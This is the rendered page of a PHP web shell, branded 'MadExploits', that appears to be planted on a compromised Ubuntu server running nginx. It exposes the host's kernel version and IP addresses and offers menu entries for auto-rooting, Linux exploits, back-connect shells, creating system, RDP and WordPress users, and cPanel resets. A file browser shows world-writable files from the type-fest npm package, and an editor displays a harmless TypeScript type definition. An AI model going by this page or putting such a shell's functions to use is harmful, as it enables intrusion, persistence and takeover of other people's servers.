Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
type-fest /
source /
[ HOME SHELL ]
Name
Size
Permission
Action
async-return-type.d.ts
715
B
-rw-rw-rw-
asyncify.d.ts
1.19
KB
-rw-rw-rw-
basic.d.ts
1.62
KB
-rw-rw-rw-
conditional-except.d.ts
1012
B
-rw-rw-rw-
conditional-keys.d.ts
1.17
KB
-rw-rw-rw-
conditional-pick.d.ts
933
B
-rw-rw-rw-
entries.d.ts
2.42
KB
-rw-rw-rw-
entry.d.ts
2.7
KB
-rw-rw-rw-
except.d.ts
886
B
-rw-rw-rw-
fixed-length-array.d.ts
1.45
KB
-rw-rw-rw-
iterable-element.d.ts
1.25
KB
-rw-rw-rw-
literal-union.d.ts
1.11
KB
-rw-rw-rw-
merge-exclusive.d.ts
1.31
KB
-rw-rw-rw-
merge.d.ts
531
B
-rw-rw-rw-
mutable.d.ts
1.76
KB
-rw-rw-rw-
opaque.d.ts
2.61
KB
-rw-rw-rw-
package-json.d.ts
13.74
KB
-rw-rw-rw-
partial-deep.d.ts
2.26
KB
-rw-rw-rw-
promisable.d.ts
775
B
-rw-rw-rw-
promise-value.d.ts
1.03
KB
-rw-rw-rw-
readonly-deep.d.ts
1.79
KB
-rw-rw-rw-
require-at-least-one.d.ts
848
B
-rw-rw-rw-
require-exactly-one.d.ts
1.23
KB
-rw-rw-rw-
set-optional.d.ts
911
B
-rw-rw-rw-
set-required.d.ts
914
B
-rw-rw-rw-
set-return-type.d.ts
1.66
KB
-rw-rw-rw-
simplify.d.ts
133
B
-rw-rw-rw-
stringified.d.ts
416
B
-rw-rw-rw-
tsconfig-json.d.ts
16.44
KB
-rw-rw-rw-
typed-array.d.ts
363
B
-rw-rw-rw-
union-to-intersection.d.ts
1.92
KB
-rw-rw-rw-
utilities.d.ts
322
B
-rw-rw-rw-
value-of.d.ts
829
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : set-optional.d.ts
import {Except} from './except'; import {Simplify} from './simplify'; /** Create a type that makes the given keys optional. The remaining keys are kept as is. The sister of the `SetRequired` type. Use-case: You want to define a single model where the only thing that changes is whether or not some of the keys are optional. @example ``` import {SetOptional} from 'type-fest'; type Foo = { a: number; b?: string; c: boolean; } type SomeOptional = SetOptional<Foo, 'b' | 'c'>; // type SomeOptional = { // a: number; // b?: string; // Was already optional and still is. // c?: boolean; // Is now optional. // } ``` */ export type SetOptional<BaseType, Keys extends keyof BaseType> = Simplify< // Pick just the keys that are readonly from the base type. Except<BaseType, Keys> & // Pick the keys that should be mutable from the base type and make them mutable. Partial<Pick<BaseType, Keys>> >;
Close